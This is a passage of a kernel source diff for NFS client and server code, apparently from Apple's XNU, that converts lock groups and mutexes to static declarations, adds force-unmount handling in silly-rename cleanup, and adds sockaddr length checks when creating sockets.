-               lck_mtx_unlock(nfs_node_hash_mutex);
+               lck_mtx_unlock(&nfs_node_hash_mutex);
                if ((error = vnode_getwithvid(vp, vid))) {
                        /*
                         * If vnode is being reclaimed or has already
@@ -389,7 +376,7 @@ loop:
        FSDBG(263, mp, dnp, npp, 0xaaaaaaaa);
 
        if (flags & NG_NOCREATE) {
-               lck_mtx_unlock(nfs_node_hash_mutex);
+               lck_mtx_unlock(&nfs_node_hash_mutex);
                *npp = 0;
                FSDBG_BOT(263, dnp, *npp, 0x80000001, ENOENT);
                return ENOENT;
@@ -436,7 +423,7 @@ loop:
        if (fhsize > NFS_SMALLFH) {
                MALLOC(np->n_fhp, u_char *, fhsize, M_NFSBIGFH, M_WAITOK);
                if (!np->n_fhp) {
-                       lck_mtx_unlock(nfs_node_hash_mutex);
+                       lck_mtx_unlock(&nfs_node_hash_mutex);
                        NFS_ZFREE(nfsnode_zone, np);
                        *npp = 0;
                        FSDBG_BOT(263, dnp, *npp, 0x80000002, ENOMEM);
@@ -454,13 +441,13 @@ loop:
        FSDBG(266, 0, np, np->n_flag, np->n_hflag);
 
        /* lock the new nfsnode */
-       lck_mtx_init(&np->n_lock, nfs_node_lck_grp, LCK_ATTR_NULL);
-       lck_rw_init(&np->n_datalock, nfs_data_lck_grp, LCK_ATTR_NULL);
-       lck_mtx_init(&np->n_openlock, nfs_open_grp, LCK_ATTR_NULL);
+       lck_mtx_init(&np->n_lock, &nfs_node_lck_grp, LCK_ATTR_NULL);
+       lck_rw_init(&np->n_datalock, &nfs_data_lck_grp, LCK_ATTR_NULL);
+       lck_mtx_init(&np->n_openlock, &nfs_open_grp, LCK_ATTR_NULL);
        lck_mtx_lock(&np->n_lock);
 
        /* release lock on hash table */
-       lck_mtx_unlock(nfs_node_hash_mutex);
+       lck_mtx_unlock(&nfs_node_hash_mutex);
 
        /* do initial loading of attributes */
        NACLINVALIDATE(np);
@@ -469,14 +456,14 @@ loop:
        if (error) {
                FSDBG(266, 0, np, np->n_flag, 0xb1eb1e);
                nfs_node_unlock(np);
-               lck_mtx_lock(nfs_node_hash_mutex);
+               lck_mtx_lock(&nfs_node_hash_mutex);
                LIST_REMOVE(np, n_hash);
                np->n_hflag &= ~(NHHASHED | NHINIT | NHLOCKED);
                if (np->n_hflag & NHLOCKWANT) {
                        np->n_hflag &= ~NHLOCKWANT;
                        wakeup(np);
                }
-               lck_mtx_unlock(nfs_node_hash_mutex);
+               lck_mtx_unlock(&nfs_node_hash_mutex);
                if (np->n_parent) {
                        if (!vnode_get(np->n_parent)) {
                                vnode_rele(np->n_parent);
@@ -484,9 +471,9 @@ loop:
                        }
                        np->n_parent = NULL;
                }
-               lck_mtx_destroy(&np->n_lock, nfs_node_lck_grp);
-               lck_rw_destroy(&np->n_datalock, nfs_data_lck_grp);
-               lck_mtx_destroy(&np->n_openlock, nfs_open_grp);
+               lck_mtx_destroy(&np->n_lock, &nfs_node_lck_grp);
+               lck_rw_destroy(&np->n_datalock, &nfs_data_lck_grp);
+               lck_mtx_destroy(&np->n_openlock, &nfs_open_grp);
                if (np->n_fhsize > NFS_SMALLFH) {
                        FREE(np->n_fhp, M_NFSBIGFH);
                }
@@ -563,14 +550,14 @@ loop:
        if (error) {
                FSDBG(266, 0, np, np->n_flag, 0xb1eb1e);
                nfs_node_unlock(np);
-               lck_mtx_lock(nfs_node_hash_mutex);
+               lck_mtx_lock(&nfs_node_hash_mutex);
                LIST_REMOVE(np, n_hash);
                np->n_hflag &= ~(NHHASHED | NHINIT | NHLOCKED);
                if (np->n_hflag & NHLOCKWANT) {
                        np->n_hflag &= ~NHLOCKWANT;
                        wakeup(np);
                }
-               lck_mtx_unlock(nfs_node_hash_mutex);
+               lck_mtx_unlock(&nfs_node_hash_mutex);
                if (np->n_parent) {
                        if (!vnode_get(np->n_parent)) {
                                vnode_rele(np->n_parent);
@@ -578,9 +565,9 @@ loop:
                        }
                        np->n_parent = NULL;
                }
-               lck_mtx_destroy(&np->n_lock, nfs_node_lck_grp);
-               lck_rw_destroy(&np->n_datalock, nfs_data_lck_grp);
-               lck_mtx_destroy(&np->n_openlock, nfs_open_grp);
+               lck_mtx_destroy(&np->n_lock, &nfs_node_lck_grp);
+               lck_rw_destroy(&np->n_datalock, &nfs_data_lck_grp);
+               lck_mtx_destroy(&np->n_openlock, &nfs_open_grp);
                if (np->n_fhsize > NFS_SMALLFH) {
                        FREE(np->n_fhp, M_NFSBIGFH);
                }
@@ -594,13 +581,13 @@ loop:
        /* node is now initialized */
 
        /* check if anyone's waiting on this node */
-       lck_mtx_lock(nfs_node_hash_mutex);
+       lck_mtx_lock(&nfs_node_hash_mutex);
        np->n_hflag &= ~(NHINIT | NHLOCKED);
        if (np->n_hflag & NHLOCKWANT) {
                np->n_hflag &= ~NHLOCKWANT;
                wakeup(np);
        }
-       lck_mtx_unlock(nfs_node_hash_mutex);
+       lck_mtx_unlock(&nfs_node_hash_mutex);
 
        *npp = np;
 
@@ -835,28 +822,37 @@ restart:
                ubc_setsize(vp, 0);
        }
 
-       /* mark this node and the directory busy while we do the remove */
-       busyerror = nfs_node_set_busy2(nsp->nsr_dnp, np, vfs_context_thread(ctx));
+       if (!vfs_isforce(nmp->nm_mountp)) {
+               /* mark this node and the directory busy while we do the remove */
+               busyerror = nfs_node_set_busy2(nsp->nsr_dnp, np, vfs_context_thread(ctx));
+       } else {
+               /* we are in force unmount we can't trust nsp->nsr_dnp, mark this np busy only */
+               busyerror = nfs_node_set_busy(np, vfs_context_thread(ctx));
+       }
 
        /* lock the node while we remove the silly file */
-       lck_mtx_lock(nfs_node_hash_mutex);
+       lck_mtx_lock(&nfs_node_hash_mutex);
        while (np->n_hflag & NHLOCKED) {
                np->n_hflag |= NHLOCKWANT;
-               msleep(np, nfs_node_hash_mutex, PINOD, "nfs_inactive", NULL);
+               msleep(np, &nfs_node_hash_mutex, PINOD, "nfs_inactive", NULL);
        }
        np->n_hflag |= NHLOCKED;
-       lck_mtx_unlock(nfs_node_hash_mutex);
+       lck_mtx_unlock(&nfs_node_hash_mutex);
 
-       /* purge the name cache to deter others from finding it */
-       bzero(&cn, sizeof(cn));
-       cn.cn_nameptr = nsp->nsr_name;
-       cn.cn_namelen = nsp->nsr_namlen;
-       nfs_name_cache_purge(nsp->nsr_dnp, np, &cn, ctx);
+       if (!vfs_isforce(nmp->nm_mountp)) {
+               /* purge the name cache to deter others from finding it */
+               bzero(&cn, sizeof(cn));
+               cn.cn_nameptr = nsp->nsr_name;
+               cn.cn_namelen = nsp->nsr_namlen;
+               nfs_name_cache_purge(nsp->nsr_dnp, np, &cn, ctx);
+       }
 
        FSDBG(264, np, np->n_size, np->n_vattr.nva_size, 0xf00d00f1);
 
-       /* now remove the silly file */
-       nfs_removeit(nsp);
+       if (!vfs_isforce(nmp->nm_mountp)) {
+               /* now remove the silly file */
+               nfs_removeit(nsp);
+       }
 
        /* clear all flags other than these */
        nfs_node_lock_force(np);
@@ -864,7 +860,11 @@ restart:
        nfs_node_unlock(np);
 
        if (!busyerror) {
-               nfs_node_clear_busy2(nsp->nsr_dnp, np);
+               if (!vfs_isforce(nmp->nm_mountp)) {
+                       nfs_node_clear_busy2(nsp->nsr_dnp, np);
+               } else {
+                       nfs_node_clear_busy(np);
+               }
        }
 
        if (unhash && vnode_isinuse(vp, 0)) {
@@ -873,7 +873,7 @@ restart:
                ubc_setsize(vp, np->n_size);
        }
 
-       lck_mtx_lock(nfs_node_hash_mutex);
+       lck_mtx_lock(&nfs_node_hash_mutex);
        if (unhash) {
                /*
                 * remove nfsnode from hash now so we can't accidentally find it
@@ -893,13 +893,16 @@ restart:
                np->n_hflag &= ~NHLOCKWANT;
                wakeup(np);
        }
-       lck_mtx_unlock(nfs_node_hash_mutex);
+       lck_mtx_unlock(&nfs_node_hash_mutex);
 
        /* cleanup sillyrename info */
        if (nsp->nsr_cred != NOCRED) {
                kauth_cred_unref(&nsp->nsr_cred);
        }
-       vnode_rele(NFSTOV(nsp->nsr_dnp));
+       if (!vfs_isforce(nmp->nm_mountp)) {
+               /* in case of forceful unmount usecounts ignore anyways */
+               vnode_rele(NFSTOV(nsp->nsr_dnp));
+       }
        FREE(nsp, M_TEMP);
        FSDBG_BOT(264, vp, np, np->n_flag, 0);
 out_free:
@@ -1056,14 +1059,14 @@ nfs_vnop_reclaim(
                lck_mtx_unlock(&nmp->nm_lock);
        }
 
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
        if (!force && (!LIST_EMPTY(&np->n_dirtyblkhd) || !LIST_EMPTY(&np->n_cleanblkhd))) {
                NP(np, "nfs_reclaim: dropping %s buffers", (!LIST_EMPTY(&np->n_dirtyblkhd) ? "dirty" : "clean"));
        }
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
        nfs_vinvalbuf(vp, V_IGNORE_WRITEERR, ap->a_context, 0);
 
-       lck_mtx_lock(nfs_node_hash_mutex);
+       lck_mtx_lock(&nfs_node_hash_mutex);
 
        if ((vnode_vtype(vp) != VDIR) && np->n_sillyrename) {
                if (!force) {
@@ -1083,7 +1086,7 @@ nfs_vnop_reclaim(
                np->n_hflag &= ~NHHASHED;
                FSDBG(266, 0, np, np->n_flag, 0xb1eb1e);
        }
-       lck_mtx_unlock(nfs_node_hash_mutex);
+       lck_mtx_unlock(&nfs_node_hash_mutex);
 
        /*
         * Free up any directory cookie structures and large file handle
@@ -1110,9 +1113,9 @@ nfs_vnop_reclaim(
                np->n_parent = NULL;
        }
 
-       lck_mtx_destroy(&np->n_lock, nfs_node_lck_grp);
-       lck_rw_destroy(&np->n_datalock, nfs_data_lck_grp);
-       lck_mtx_destroy(&np->n_openlock, nfs_open_grp);
+       lck_mtx_destroy(&np->n_lock, &nfs_node_lck_grp);
+       lck_rw_destroy(&np->n_datalock, &nfs_data_lck_grp);
+       lck_mtx_destroy(&np->n_openlock, &nfs_open_grp);
 
        FSDBG_BOT(265, vp, np, np->n_flag, 0xd1ed1e);
        NFS_ZFREE(nfsnode_zone, np);
@@ -1434,7 +1437,7 @@ nfs_mount_is_dirty(mount_t mp)
        u_long ncnt = 0;
        microuptime(&now);
 #endif
-       lck_mtx_lock(nfs_node_hash_mutex);
+       lck_mtx_lock(&nfs_node_hash_mutex);
        for (i = 0; i <= nfsnodehash; i++) {
                LIST_FOREACH(np, &nfsnodehashtbl[i], n_hash) {
 #ifdef DODEBUG
@@ -1446,7 +1449,7 @@ nfs_mount_is_dirty(mount_t mp)
                }
        }
 out:
-       lck_mtx_unlock(nfs_node_hash_mutex);
+       lck_mtx_unlock(&nfs_node_hash_mutex);
 #ifdef DODEBUG
        microuptime(&then);
        timersub(&then, &now, &diff);
index 31db576a6ee51329ae8eff7df7337ee5b05e4f27..0346a75028f32f812df4916dede2f5f1953a0b27 100644 (file)
 
 int nfsd_thread_count = 0;
 int nfsd_thread_max = 0;
-lck_grp_t *nfsd_lck_grp;
-lck_mtx_t *nfsd_mutex;
+static LCK_GRP_DECLARE(nfsd_lck_grp, "nfsd");
+LCK_MTX_DECLARE(nfsd_mutex, &nfsd_lck_grp);
 struct nfsd_head nfsd_head, nfsd_queue;
 
-lck_grp_t *nfsrv_slp_rwlock_group;
-lck_grp_t *nfsrv_slp_mutex_group;
+LCK_GRP_DECLARE(nfsrv_slp_rwlock_group, "nfsrv-slp-rwlock");
+LCK_GRP_DECLARE(nfsrv_slp_mutex_group, "nfsrv-slp-mutex");
 struct nfsrv_sockhead nfsrv_socklist, nfsrv_sockwg,
     nfsrv_sockwait, nfsrv_sockwork;
 struct nfsrv_sock *nfsrv_udpsock = NULL;
@@ -132,15 +132,15 @@ struct nfsrv_expfs_list nfsrv_exports;
 struct nfsrv_export_hashhead *nfsrv_export_hashtbl = NULL;
 int nfsrv_export_hash_size = NFSRVEXPHASHSZ;
 u_long nfsrv_export_hash;
-lck_grp_t *nfsrv_export_rwlock_group;
-lck_rw_t nfsrv_export_rwlock;
+static LCK_GRP_DECLARE(nfsrv_export_rwlock_group, "nfsrv-export-rwlock");
+LCK_RW_DECLARE(nfsrv_export_rwlock, &nfsrv_export_rwlock_group);
 
 #if CONFIG_FSE
 /* NFS server file modification event generator */
 struct nfsrv_fmod_hashhead *nfsrv_fmod_hashtbl;
 u_long nfsrv_fmod_hash;
-lck_grp_t *nfsrv_fmod_grp;
-lck_mtx_t *nfsrv_fmod_mutex;
+static LCK_GRP_DECLARE(nfsrv_fmod_grp, "nfsrv_fmod");
+LCK_MTX_DECLARE(nfsrv_fmod_mutex, &nfsrv_fmod_grp);
 static int nfsrv_fmod_timer_on = 0;
 int nfsrv_fsevents_enabled = 1;
 #endif
@@ -158,7 +158,7 @@ uint32_t nfsrv_user_stat_enabled = 1;
 uint32_t nfsrv_user_stat_node_count = 0;
 uint32_t nfsrv_user_stat_max_idle_sec = NFSRV_USER_STAT_DEF_IDLE_SEC;
 uint32_t nfsrv_user_stat_max_nodes = NFSRV_USER_STAT_DEF_MAX_NODES;
-lck_grp_t *nfsrv_active_user_mutex_group;
+LCK_GRP_DECLARE(nfsrv_active_user_mutex_group, "nfs-active-user-mutex");
 
 int nfsrv_wg_delay = NFSRV_WGATHERDELAY * 1000;
 int nfsrv_wg_delay_v3 = 0;
@@ -203,31 +203,12 @@ nfsrv_init(void)
                printf("struct nfsrv_sock bloated (> %dbytes)\n", NFS_SVCALLOC);
        }
 
-       /* init nfsd mutex */
-       nfsd_lck_grp = lck_grp_alloc_init("nfsd", LCK_GRP_ATTR_NULL);
-       nfsd_mutex = lck_mtx_alloc_init(nfsd_lck_grp, LCK_ATTR_NULL);
-
-       /* init slp rwlock */
-       nfsrv_slp_rwlock_group = lck_grp_alloc_init("nfsrv-slp-rwlock", LCK_GRP_ATTR_NULL);
-       nfsrv_slp_mutex_group  = lck_grp_alloc_init("nfsrv-slp-mutex", LCK_GRP_ATTR_NULL);
-
        /* init export data structures */
        LIST_INIT(&nfsrv_exports);
-       nfsrv_export_rwlock_group = lck_grp_alloc_init("nfsrv-export-rwlock", LCK_GRP_ATTR_NULL);
-       lck_rw_init(&nfsrv_export_rwlock, nfsrv_export_rwlock_group, LCK_ATTR_NULL);
-
-       /* init active user list mutex structures */
-       nfsrv_active_user_mutex_group = lck_grp_alloc_init("nfs-active-user-mutex", LCK_GRP_ATTR_NULL);
-
-       /* init nfs server request cache mutex */
-       nfsrv_reqcache_lck_grp = lck_grp_alloc_init("nfsrv_reqcache", LCK_GRP_ATTR_NULL);
-       nfsrv_reqcache_mutex = lck_mtx_alloc_init(nfsrv_reqcache_lck_grp, LCK_ATTR_NULL);
 
 #if CONFIG_FSE
        /* init NFS server file modified event generation */
        nfsrv_fmod_hashtbl = hashinit(NFSRVFMODHASHSZ, M_TEMP, &nfsrv_fmod_hash);
-       nfsrv_fmod_grp = lck_grp_alloc_init("nfsrv_fmod", LCK_GRP_ATTR_NULL);
-       nfsrv_fmod_mutex = lck_mtx_alloc_init(nfsrv_fmod_grp, LCK_ATTR_NULL);
 #endif
 
        /* initialize NFS server timer callouts */
@@ -1146,7 +1127,7 @@ nfsrv_fmod_timer(__unused void *param0, __unused void *param1)
        int i, fmod_fire;
 
        LIST_INIT(&firehead);
-       lck_mtx_lock(nfsrv_fmod_mutex);
+       lck_mtx_lock(&nfsrv_fmod_mutex);
 again:
        clock_get_uptime(&timenow);
        clock_interval_to_deadline(nfsrv_fmod_pendtime, 1000 * 1000,
@@ -1194,7 +1175,7 @@ again:
        }
 
        if (fmod_fire) {
-               lck_mtx_unlock(nfsrv_fmod_mutex);
+               lck_mtx_unlock(&nfsrv_fmod_mutex);
                /*
                 * Fire off the content modified fsevent for each
                 * entry and free it.
@@ -1211,7 +1192,7 @@ again:
                        LIST_REMOVE(fp, fm_link);
                        FREE(fp, M_TEMP);
                }
-               lck_mtx_lock(nfsrv_fmod_mutex);
+               lck_mtx_lock(&nfsrv_fmod_mutex);
                nfsrv_fmod_pending -= fmod_fire;
                goto again;
        }
@@ -1234,7 +1215,7 @@ again:
                nfs_interval_timer_start(nfsrv_fmod_timer_call, interval);
        }
 
-       lck_mtx_unlock(nfsrv_fmod_mutex);
+       lck_mtx_unlock(&nfsrv_fmod_mutex);
 }
 
 /*
@@ -1250,7 +1231,7 @@ nfsrv_modified(vnode_t vp, vfs_context_t ctx)
        struct nfsrv_fmod *fp;
        struct nfsrv_fmod_hashhead *head;
 
-       lck_mtx_lock(nfsrv_fmod_mutex);
+       lck_mtx_lock(&nfsrv_fmod_mutex);
 
        /*
         * Compute the time in the future when the
@@ -1271,7 +1252,7 @@ nfsrv_modified(vnode_t vp, vfs_context_t ctx)
                                LIST_REMOVE(fp, fm_link);
                                LIST_INSERT_HEAD(head, fp, fm_link);
                        }
-                       lck_mtx_unlock(nfsrv_fmod_mutex);
+                       lck_mtx_unlock(&nfsrv_fmod_mutex);
                        return;
                }
        }
@@ -1306,7 +1287,7 @@ nfsrv_modified(vnode_t vp, vfs_context_t ctx)
                    nfsrv_fmod_pendtime);
        }
 done:
-       lck_mtx_unlock(nfsrv_fmod_mutex);
+       lck_mtx_unlock(&nfsrv_fmod_mutex);
        return;
 }
 #endif /* CONFIG_FSE */
@@ -1856,7 +1837,7 @@ loop1:
         *
         * Add/Remove the socket in the nfsrv_sockwg queue as needed.
         */
-       lck_mtx_lock(nfsd_mutex);
+       lck_mtx_lock(&nfsd_mutex);
        if (slp->ns_wgtime) {
                if (slp->ns_wgq.tqe_next == SLPNOLIST) {
                        TAILQ_INSERT_HEAD(&nfsrv_sockwg, slp, ns_wgq);
@@ -1870,7 +1851,7 @@ loop1:
                TAILQ_REMOVE(&nfsrv_sockwg, slp, ns_wgq);
                slp->ns_wgq.tqe_next = SLPNOLIST;
        }
-       lck_mtx_unlock(nfsd_mutex);
+       lck_mtx_unlock(&nfsd_mutex);
 
        return 0;
 }
@@ -1950,7 +1931,7 @@ nfsrv_wg_timer(__unused void *param0, __unused void *param1)
        cur_usec = now.tv_sec * 1000000 + now.tv_usec;
        next_usec = cur_usec + (NFSRV_WGATHERDELAY * 1000);
 
-       lck_mtx_lock(nfsd_mutex);
+       lck_mtx_lock(&nfsd_mutex);
        TAILQ_FOREACH(slp, &nfsrv_sockwg, ns_wgq) {
                if (slp->ns_wgtime) {
                        writes_pending++;
@@ -1969,10 +1950,10 @@ nfsrv_wg_timer(__unused void *param0, __unused void *param1)
 
        if (writes_pending == 0) {
                nfsrv_wg_timer_on = 0;
-               lck_mtx_unlock(nfsd_mutex);
+               lck_mtx_unlock(&nfsd_mutex);
                return;
        }
-       lck_mtx_unlock(nfsd_mutex);
+       lck_mtx_unlock(&nfsd_mutex);
 
        /*
         * Return the number of msec to wait again
index eaca59ada18a6e41c6dd36299f82b1bf785a13a7..435bbb7826a0b41d35348fb883d4c5298aa3b60f 100644 (file)
@@ -90,6 +90,7 @@
 #include <sys/tprintf.h>
 #include <libkern/OSAtomic.h>
 
+#include <sys/reboot.h>
 #include <sys/time.h>
 #include <kern/clock.h>
 #include <kern/task.h>
 #define NFS_SOCK_DBG(...) NFS_DBG(NFS_FAC_SOCK, 7, ## __VA_ARGS__)
 #define NFS_SOCK_DUMP_MBUF(msg, mb) if (NFS_IS_DBG(NFS_FAC_SOCK, 15)) nfs_dump_mbuf(__func__, __LINE__, (msg), (mb))
 
+#ifndef SUN_LEN
+#define SUN_LEN(su) \
+       (sizeof(*(su)) - sizeof((su)->sun_path) + strnlen((su)->sun_path, sizeof((su)->sun_path)))
+#endif /* SUN_LEN */
+
 /* XXX */
 boolean_t       current_thread_aborted(void);
 kern_return_t   thread_terminate(thread_t);
@@ -552,17 +558,27 @@ nfs_socket_create(
 
        switch (sa->sa_family) {
        case AF_INET:
+               if (sa->sa_len != sizeof(struct sockaddr_in)) {
+                       return EINVAL;
+               }
+               sinaddr = &((struct sockaddr_in*)sa)->sin_addr;
+               if (inet_ntop(sa->sa_family, sinaddr, naddr, sizeof(naddr)) != naddr) {
+                       strlcpy(naddr, "<unknown>", sizeof(naddr));
+               }
+               break;
        case AF_INET6:
-               if (sa->sa_family == AF_INET) {
-                       sinaddr = &((struct sockaddr_in*)sa)->sin_addr;
-               } else {
-                       sinaddr = &((struct sockaddr_in6*)sa)->sin6_addr;
+               if (sa->sa_len != sizeof(struct sockaddr_in6)) {
+                       return EINVAL;
                }
+               sinaddr = &((struct sockaddr_in6*)sa)->sin6_addr;
                if (inet_ntop(sa->sa_family, sinaddr, naddr, sizeof(naddr)) != naddr) {
                        strlcpy(naddr, "<unknown>", sizeof(naddr));
                }
                break;
        case AF_LOCAL:
+               if (sa->sa_len != sizeof(struct sockaddr_un) && sa->sa_len != SUN_LEN((struct sockaddr_un *)sa)) {
+                       return EINVAL;
+               }
                strlcpy(naddr, ((struct sockaddr_un *)sa)->sun_path, sizeof(naddr));
                break;
        default:
@@ -586,7 +602,7 @@ nfs_socket_create(
                }
                return ENOMEM;
        }
-       lck_mtx_init(&nso->nso_lock, nfs_request_grp, LCK_ATTR_NULL);
+       lck_mtx_init(&nso->nso_lock, &nfs_request_grp, LCK_ATTR_NULL);
        nso->nso_sotype = sotype;
        if (nso->nso_sotype == SOCK_STREAM) {
                nfs_rpc_record_state_init(&nso->nso_rrs);
@@ -673,7 +689,7 @@ nfs_socket_destroy(struct nfs_socket *nso)
        if (nso->nso_sotype == SOCK_STREAM) {
                nfs_rpc_record_state_cleanup(&nso->nso_rrs);
        }
-       lck_mtx_destroy(&nso->nso_lock, nfs_request_grp);
+       lck_mtx_destroy(&nso->nso_lock, &nfs_request_grp);
        if (nso->nso_saddr) {
                FREE(nso->nso_saddr, M_SONAME);
        }
@@ -1988,7 +2004,7 @@ nfs_reconnect(struct nfsmount *nmp)
         * as needing a resend.  (Though nfs_need_reconnect() probably
         * marked them all already.)
         */
-       lck_mtx_lock(nfs_request_mutex);
+       lck_mtx_lock(&nfs_request_mutex);
        TAILQ_FOREACH(rq, &nfs_reqq, r_chain) {
                if (rq->r_nmp == nmp) {
                        lck_mtx_lock(&rq->r_mtx);
@@ -2003,7 +2019,7 @@ nfs_reconnect(struct nfsmount *nmp)
                        lck_mtx_unlock(&rq->r_mtx);
                }
        }
-       lck_mtx_unlock(nfs_request_mutex);
+       lck_mtx_unlock(&nfs_request_mutex);
        return 0;
 }
 
@@ -2061,7 +2077,7 @@ nfs_need_reconnect(struct nfsmount *nmp)
         * Loop through outstanding request list and
         * mark all requests as needing a resend.
         */
-       lck_mtx_lock(nfs_request_mutex);
+       lck_mtx_lock(&nfs_request_mutex);
        TAILQ_FOREACH(rq, &nfs_reqq, r_chain) {
                if (rq->r_nmp == nmp) {
                        lck_mtx_lock(&rq->r_mtx);
@@ -2076,7 +2092,7 @@ nfs_need_reconnect(struct nfsmount *nmp)
                        lck_mtx_unlock(&rq->r_mtx);
                }
        }
-       lck_mtx_unlock(nfs_request_mutex);
+       lck_mtx_unlock(&nfs_request_mutex);
 }
 
 
@@ -2445,7 +2461,7 @@ nfs4_mount_callback_setup(struct nfsmount *nmp)
        int error, on = 1;
        in_port_t port;
 
-       lck_mtx_lock(nfs_global_mutex);
+       lck_mtx_lock(&nfs_global_mutex);
        if (nfs4_cb_id == 0) {
                TAILQ_INIT(&nfs4_cb_mounts);
                TAILQ_INIT(&nfs4_cb_socks);
@@ -2459,7 +2475,7 @@ nfs4_mount_callback_setup(struct nfsmount *nmp)
        TAILQ_INSERT_HEAD(&nfs4_cb_mounts, nmp, nm_cblink);
 
        if (nfs4_cb_so) {
-               lck_mtx_unlock(nfs_global_mutex);
+               lck_mtx_unlock(&nfs_global_mutex);
                return;
        }
 
@@ -2575,7 +2591,7 @@ ipv6_bind_again:
 fail:
        if (error) {
                nfs4_cb_so = nfs4_cb_so6 = NULL;
-               lck_mtx_unlock(nfs_global_mutex);
+               lck_mtx_unlock(&nfs_global_mutex);
                if (so) {
                        sock_shutdown(so, SHUT_RDWR);
                        sock_close(so);
@@ -2585,7 +2601,7 @@ fail:
                        sock_close(so6);
                }
        } else {
-               lck_mtx_unlock(nfs_global_mutex);
+               lck_mtx_unlock(&nfs_global_mutex);
        }
 }
 
@@ -2604,19 +2620,19 @@ nfs4_mount_callback_shutdown(struct nfsmount *nmp)
        struct nfs4_cb_sock_list cb_socks;
        struct timespec ts = { .tv_sec = 1, .tv_nsec = 0 };
 
-       lck_mtx_lock(nfs_global_mutex);
+       lck_mtx_lock(&nfs_global_mutex);
        if (nmp->nm_cbid == 0) {
-               lck_mtx_unlock(nfs_global_mutex);
+               lck_mtx_unlock(&nfs_global_mutex);
                return;
        }
        TAILQ_REMOVE(&nfs4_cb_mounts, nmp, nm_cblink);
        /* wait for any callbacks in progress to complete */
        while (nmp->nm_cbrefs) {
-               msleep(&nmp->nm_cbrefs, nfs_global_mutex, PSOCK, "cbshutwait", &ts);
+               msleep(&nmp->nm_cbrefs, &nfs_global_mutex, PSOCK, "cbshutwait", &ts);
        }
        nmp->nm_cbid = 0;
        if (--nfs4_cb_so_usecount) {
-               lck_mtx_unlock(nfs_global_mutex);
+               lck_mtx_unlock(&nfs_global_mutex);
                return;
        }
        so = nfs4_cb_so;
@@ -2624,7 +2640,7 @@ nfs4_mount_callback_shutdown(struct nfsmount *nmp)
        nfs4_cb_so = nfs4_cb_so6 = NULL;
        TAILQ_INIT(&cb_socks);
        TAILQ_CONCAT(&cb_socks, &nfs4_cb_socks, ncbs_link);
-       lck_mtx_unlock(nfs_global_mutex);
+       lck_mtx_unlock(&nfs_global_mutex);
        if (so) {
                sock_shutdown(so, SHUT_RDWR);
                sock_close(so);
@@ -2654,10 +2670,10 @@ nfs4_callback_timer(__unused void *param0, __unused void *param1)
        struct timeval now;
 
 loop:
-       lck_mtx_lock(nfs_global_mutex);
+       lck_mtx_lock(&nfs_global_mutex);
        if (TAILQ_EMPTY(&nfs4_cb_socks)) {
                nfs4_callback_timer_on = 0;
-               lck_mtx_unlock(nfs_global_mutex);
+               lck_mtx_unlock(&nfs_global_mutex);
                return;
        }
        microuptime(&now);
@@ -2667,7 +2683,7 @@ loop:
                        continue;
                }
                TAILQ_REMOVE(&nfs4_cb_socks, ncbsp, ncbs_link);
-               lck_mtx_unlock(nfs_global_mutex);
+               lck_mtx_unlock(&nfs_global_mutex);
                sock_shutdown(ncbsp->ncbs_so, SHUT_RDWR);
                sock_close(ncbsp->ncbs_so);
                nfs_rpc_record_state_cleanup(&ncbsp->ncbs_rrs);
@@ -2677,7 +2693,7 @@ loop:
        nfs4_callback_timer_on = 1;
        nfs_interval_timer_start(nfs4_callback_timer_call,
            NFS4_CB_TIMER_PERIOD * 1000);
-       lck_mtx_unlock(nfs_global_mutex);
+       lck_mtx_unlock(&nfs_global_mutex);
 }
 
 /*
@@ -2741,7 +2757,7 @@ nfs4_cb_accept(socket_t so, __unused void *arg, __unused int waitflag)
        microuptime(&now);
        ncbsp->ncbs_stamp = now.tv_sec;
 
-       lck_mtx_lock(nfs_global_mutex);
+       lck_mtx_lock(&nfs_global_mutex);
 
        /* add it to the list */
        TAILQ_INSERT_HEAD(&nfs4_cb_socks, ncbsp, ncbs_link);
@@ -2772,7 +2788,7 @@ nfs4_cb_accept(socket_t so, __unused void *arg, __unused int waitflag)
                nfs_interval_timer_start(nfs4_callback_timer_call, 500);
        }
 
-       lck_mtx_unlock(nfs_global_mutex);
+       lck_mtx_unlock(&nfs_global_mutex);
 }
 
 /*
@@ -2788,14 +2804,14 @@ nfs4_cb_rcv(socket_t so, void *arg, __unused int waitflag)
        mbuf_t m;
        int error = 0, recv = 1;
 
-       lck_mtx_lock(nfs_global_mutex);
+       lck_mtx_lock(&nfs_global_mutex);
        while (ncbsp->ncbs_flags & NCBSOCK_UPCALL) {
                /* wait if upcall is already in progress */
                ncbsp->ncbs_flags |= NCBSOCK_UPCALLWANT;
-               msleep(ncbsp, nfs_global_mutex, PSOCK, "cbupcall", &ts);
+               msleep(ncbsp, &nfs_global_mutex, PSOCK, "cbupcall", &ts);
        }
        ncbsp->ncbs_flags |= NCBSOCK_UPCALL;
-       lck_mtx_unlock(nfs_global_mutex);
+       lck_mtx_unlock(&nfs_global_mutex);
 
        /* loop while we make error-free progress */
        while (!error && recv) {
@@ -2819,9 +2835,9 @@ nfs4_cb_rcv(socket_t so, void *arg, __unused int waitflag)
                ncbsp->ncbs_stamp = now.tv_sec;
        }
 
-       lck_mtx_lock(nfs_global_mutex);
+       lck_mtx_lock(&nfs_global_mutex);
        ncbsp->ncbs_flags &= ~NCBSOCK_UPCALL;
-       lck_mtx_unlock(nfs_global_mutex);
+       lck_mtx_unlock(&nfs_global_mutex);
        wakeup(ncbsp);
 }
 
@@ -2924,7 +2940,7 @@ nfs4_cb_handler(struct nfs_callback_socket *ncbsp, mbuf_t mreq)
                        goto nfsmout;
                }
                /* match the callback ID to a registered mount */
-               lck_mtx_lock(nfs_global_mutex);
+               lck_mtx_lock(&nfs_global_mutex);
                TAILQ_FOREACH(nmp, &nfs4_cb_mounts, nm_cblink) {
                        if (nmp->nm_cbid != cbid) {
                                continue;
@@ -2941,7 +2957,7 @@ nfs4_cb_handler(struct nfs_callback_socket *ncbsp, mbuf_t mreq)
                if (nmp) {
                        nmp->nm_cbrefs++;
                }
-               lck_mtx_unlock(nfs_global_mutex);
+               lck_mtx_unlock(&nfs_global_mutex);
                if (!nmp) {
                        /* if no mount match, just drop socket. */
                        error = EPERM;
@@ -3087,12 +3103,12 @@ nfs4_cb_handler(struct nfs_callback_socket *ncbsp, mbuf_t mreq)
                nfsm_chain_null(&nmrep);
 
                /* drop the callback reference on the mount */
-               lck_mtx_lock(nfs_global_mutex);
+               lck_mtx_lock(&nfs_global_mutex);
                nmp->nm_cbrefs--;
